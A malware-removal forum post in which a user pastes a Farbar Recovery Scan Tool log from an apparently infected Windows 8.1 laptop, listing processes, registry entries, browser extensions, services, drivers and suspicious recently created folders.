                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          
*****************
 
 
 
 = = = =   E n d   o f   F i x l o g   2 1 : 3 3 : 0 3   = = = =


#24 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 12 June 2018 - 09:40 AM

Here's the FRST txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06.06.2018 01
Ran by Dan (administrator) on BEATLES (11-06-2018 21:51:39)
Running from D:\
Loaded Profiles: Dan (Available Profiles: Dan)
Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(TOSHIBA CORPORATION) C:\Windows\System32\avmhengsvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe
() C:\ProgramData\dahhService\dahhService.exe
() C:\Program Files\Gramblr\gramblr.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(www.shadowexplorer.com) C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusVibe\AsusVibe2.0.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSPanel.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\MaxxAudioControl64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Windows NT\Accessories\wordpad.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1610936 2016-07-10] (COMODO)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSLoader.exe [63296 2014-02-25] ()
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1980416 2013-12-18] (Wondershare)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime Alternative\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1589592 2018-03-20] (Google Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [xdm] => C:\Users\Dan\AppData\Local\XDM\xdm.exe [782848 2014-11-15] (Subhra Das Gupta)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8641240 2016-02-12] (Piriform Ltd)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca0a9-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe" 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca102-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe" 
AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2016-05-16]
ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe ()
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyEnable: [.DEFAULT] => Proxy is enabled.
ProxyServer: [.DEFAULT] => http=127.0.0.1:61746;https=127.0.0.1:61746
ProxyEnable: [S-1-5-21-1066246007-1091995785-1061003623-1001] => Proxy is enabled.
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{4BFECB1F-C4F4-478B-9423-CF38BB3D1339}: [DhcpNameServer] 167.206.112.3 167.206.112.4
Tcpip\..\Interfaces\{ADE3F806-57EF-4246-85D9-1A41A1425F70}: [DhcpNameServer] 208.67.222.222 208.67.220.220
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: jefccanc.Daniel-1506042165545
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default [2018-06-08]
FF Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\abs@avira.com.xpi [2017-06-17]
FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]
FF Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-05-31] [Legacy]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-06-08]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-06-08]
FF HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Firefox\Extensions: [xdmff@xdman.sourceforge.net] - C:\Users\Dan\AppData\Local\XDM\xdmff
FF Extension: (XDM Helper) - C:\Users\Dan\AppData\Local\XDM\xdmff [2016-04-03] [Legacy] [not signed]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-04-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1066246007-1091995785-1061003623-1001: signiant.com/SigniantTransfer -> C:\Users\Dan\AppData\Roaming\SigniantInc\SigniantTransfer\5.4.4.71844\npSigniantTransfer.dll [2015-07-09] (Signiant Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> search.mpc.am
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default [2018-06-08]
CHR Extension: (Slides) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-22]
CHR Extension: (Facebook Video Downloader - Save FB Video) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2018-03-20]
CHR Extension: (Docs) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-22]
CHR Extension: (Instagram tools) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apchgljmbdmgpelofkpfaghmjcgkcmmb [2016-04-03]
CHR Extension: (Google Drive) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-03]
CHR Extension: (Audiotool) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2016-04-03]
CHR Extension: (YouTube) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-03]
CHR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpconcjcammlapcogcnnelfmaeghhagj [2018-02-04]
CHR Extension: (APK Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgihflhdpokeobcfimliamffejfnmfii [2016-04-03]
CHR Extension: (Google Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-04-03]
CHR Extension: (Sheets) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-22]
CHR Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-06-10]
CHR Extension: (Trevx - Music Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmaepaboafhefdejcbiciklgjogoghf [2016-05-15]
CHR Extension: (Google Docs Offline) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]
CHR Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-20]
CHR Extension: (Video Converter) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcjjnhgakghmggnimjkldjmmpabhnhne [2016-03-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Image Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik [2016-11-22]
CHR Extension: (Notifications for Instagram) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\opnbmdkdflhjiclaoiiifmheknpccalb [2018-01-15]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR Extension: (Adobe HDS / HLS Video Saver) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pibndofbpkoaipoidbkephfhhnapkccn [2018-03-08]
CHR Extension: (Gmail) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-03]
CHR Extension: (Chrome Media Router) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-03-22]
CHR Extension: (Instagram) - C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre [2016-03-13]
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile [2018-06-08]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)
 
S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION
R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021056 2016-03-03] (Adobe Systems, Incorporated)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe [71680 2014-02-25] (ASUS Cloud Corporation) [File not signed]
S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [5817256 2016-07-10] (COMODO)
S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2271928 2016-07-10] (COMODO)
R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()
R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [12021840 2018-03-07] () [File not signed]
S4 gzserv; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\gzserv.exe [79552 2018-03-08] (Bitdefender)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)
S2 MBAMService; C:\Program File (x86) Malwarebytes Anti-Malware - VER. 2-B\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)
R2 sesvc; C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe [9216 2011-01-02] (www.shadowexplorer.com) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)
S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]
S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]
S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()
R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3892224 2014-03-07] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [71952 2014-03-31] (ASUS Corporation)
R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [718840 2013-04-17] (BitDefender)
U5 avchv; C:\Windows\System32\Drivers\avchv.sys [261056 2016-03-06] (BitDefender)
S3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [593144 2013-04-17] (BitDefender)
R1 bdfwfpf; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\bdfwfpf.sys [121928 2013-07-02] (Bitdefender SRL)
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32224 2016-07-10] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [851864 2016-07-10] (COMODO)
R1 cmdhlp; C:\Windows\system32\DRIVERS\cmdhlp.sys [45600 2016-07-10] (COMODO)
R1 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [148696 2013-04-22] (BitDefender LLC)
R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [138568 2016-07-10] (COMODO)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2013-10-27] (Intel Corporation)
S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R3 TotRec8; C:\Windows\system32\drivers\TotRec8.sys [125640 2014-04-30] (High Criteria inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2017-06-09] ()
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [382536 2013-05-28] (BitDefender S.R.L.)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
R3 VASDeviceDrm; C:\Windows\system32\drivers\vasdDev.sys [1454896 2012-03-19] (ShiningMorning Inc.)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2014-09-21] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2014-09-21] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)
R3 adhknq; system32\drivers\hknqux.sys [X]
S4 hrlvm; System32\drivers\usbcmpvz.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-11 21:49 - 2018-06-11 21:49 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-06-11 21:38 - 2018-06-11 21:38 - 000000000 ____D C:\Users\Dan\AppData\Local\vsdkhmb
2018-06-11 21:35 - 2018-06-11 21:35 - 000142672 ____N C:\Windows\system32\Drivers\cooehlor.sys
2018-06-11 21:17 - 2018-06-11 21:17 - 000000000 ____D C:\Users\Dan\AppData\Local\cwkbude
2018-06-11 20:54 - 2018-06-11 20:54 - 000000000 ____D C:\Users\Dan\AppData\Local\ianhgkz
2018-06-11 20:14 - 2018-06-11 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\spnamrh
2018-06-10 20:19 - 2018-06-10 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdhvpka
2018-06-09 19:36 - 2018-06-09 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\psnwzov
2018-06-08 20:22 - 2018-06-08 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\sprxnmw
2018-06-07 20:25 - 2018-06-07 20:25 - 000000000 ____D C:\Users\Dan\AppData\Local\zaothbn
2018-06-06 20:16 - 2018-06-06 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\upcnzih
2018-06-05 20:19 - 2018-06-05 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdavblr
2018-06-04 20:46 - 2018-06-04 20:46 - 000000000 ____D C:\Users\Dan\AppData\Local\upmrihe
2018-06-04 20:15 - 2018-06-04 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\widgtzk
2018-06-03 20:18 - 2018-06-03 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\msapgde
2018-06-02 19:42 - 2018-06-02 19:42 - 000000000 ____D C:\Users\Dan\AppData\Local\reepcgo
2018-06-01 20:21 - 2018-06-01 20:21 - 000000000 ____D C:\Users\Dan\AppData\Local\wmkxhrt
2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt
2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw
2018-05-29 20:47 - 2018-05-29 21:04 - 000003084 _____ C:\Windows\System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A}
2018-05-29 20:16 - 2018-05-29 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\avcsxeg
2018-05-28 20:16 - 2018-05-28 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\dtiroaw
2018-05-27 20:40 - 2018-05-27 20:40 - 000000146 _____ C:\Users\Dan\Desktop\Windows Defender - Shortcut.lnk
2018-05-27 20:12 - 2018-05-27 20:12 - 000000000 ____D C:\Users\Dan\AppData\Local\vdmbsup
2018-05-26 19:39 - 2018-05-26 19:39 - 000000000 ____D C:\Users\Dan\AppData\Local\cgkeslp
2018-05-25 20:18 - 2018-05-25 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\nimzwrx
2018-05-24 20:16 - 2018-05-24 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\svhznix
2018-05-23 23:10 - 2018-05-23 23:10 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ C:\Users\Dan\AppData\Local\recently-used.xbel
2018-05-23 20:16 - 2018-05-23 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\coeaubg
2018-05-22 20:15 - 2018-05-22 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\lsrgdch
2018-05-21 18:54 - 2018-05-21 18:54 - 000000000 ____D C:\Users\Dan\AppData\Local\tihexad
2018-05-20 19:05 - 2018-05-20 19:05 - 000000000 ____D C:\Users\Dan\AppData\Local\rtksgep
2018-05-19 19:36 - 2018-05-19 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\usbziol
2018-05-18 20:19 - 2018-05-18 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\mskiwue
2018-05-17 20:18 - 2018-05-17 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wictgzl
2018-05-16 20:14 - 2018-05-16 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\scdhbzo
